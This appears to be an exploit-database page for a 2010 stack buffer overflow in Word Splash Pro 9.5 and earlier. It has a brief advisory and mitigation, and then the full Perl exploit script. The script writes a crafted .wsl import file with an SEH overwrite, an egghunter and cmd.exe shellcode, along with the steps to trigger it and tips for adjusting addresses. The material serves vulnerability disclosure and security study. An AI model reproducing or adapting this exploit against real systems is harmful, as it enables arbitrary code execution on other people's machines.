Word Splash Pro - exploit.company

vendor:

Word Splash Pro

by:

h1ch4m

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Word Splash Pro

Affected Version From: <= 9.5

Affected Version To: <= 9.5

Patch Exists: YES

Related CWE: N/A

CPE: a:chronasoft:word_splash_pro

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win XP SP3 French

2010

Word Splash Pro <= 9.5 Buffer Overflow -EggHunter-

Word Splash Pro is vulnerable to a buffer overflow attack when a specially crafted file is imported. This can be exploited to execute arbitrary code by exploiting a stack-based buffer overflow in the application. The vulnerability is caused due to a boundary error when importing a specially crafted file with an overly long string. This can be exploited to cause a stack-based buffer overflow by overwriting the saved return address with an attacker-supplied address. Successful exploitation of this vulnerability can result in arbitrary code execution in the context of the application.

Mitigation:

Upgrade to the latest version of Word Splash Pro

Source

Exploit-DB raw data:

# Exploit Title: Word Splash Pro  <= 9.5 Buffer Overflow -EggHunter-
# Software Link: http://www.chronasoft.com/software/wordsplashpro
# Version: <= 9.5
# Tested on: Win XP SP3 French
# Date: 20/12/2010
# Author: h1ch4m
#Email: h1ch4m@live.fr
#Home: Net-Effects.blogspot.com
#Greetz : Peter Van Eeckhoutte, Exploit-Database Team,  Zhir0
#Note: tested on version 9.5 & 8.3,  you may have to change the address of pop pop ret according to your sp & the program version
# triggering details:  file->Word list->Import then click on Word List Builder button 

my $file = "1.wsl";

my $size = 4112;

my $nseh = "\xeb\x06\x90\x90"; # jump 6 bytes

my $seh = pack('V', 0x01de44dc); # pop pop ret  from CRDE2000.DLL

my $egg = "w00tw00t";

my $egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"\x77\x30\x30\x74". 
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# Shellcode :  windows/XP sp2 (FR) Sellcode cmd.exe 32 bytes - Mountassif Moad aka Stack
#                      http://www.exploit-db.com/exploits/13510/
my $shellcode = "\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";

my $junk = "\x90" x ($size-length($egg.$shellcode));

open($FILE,">$file");
print $FILE $egg.$shellcode.$junk.$nseh.$seh.$egghunter;
close($FILE);
print "File Created successfully\n";
sleep(1);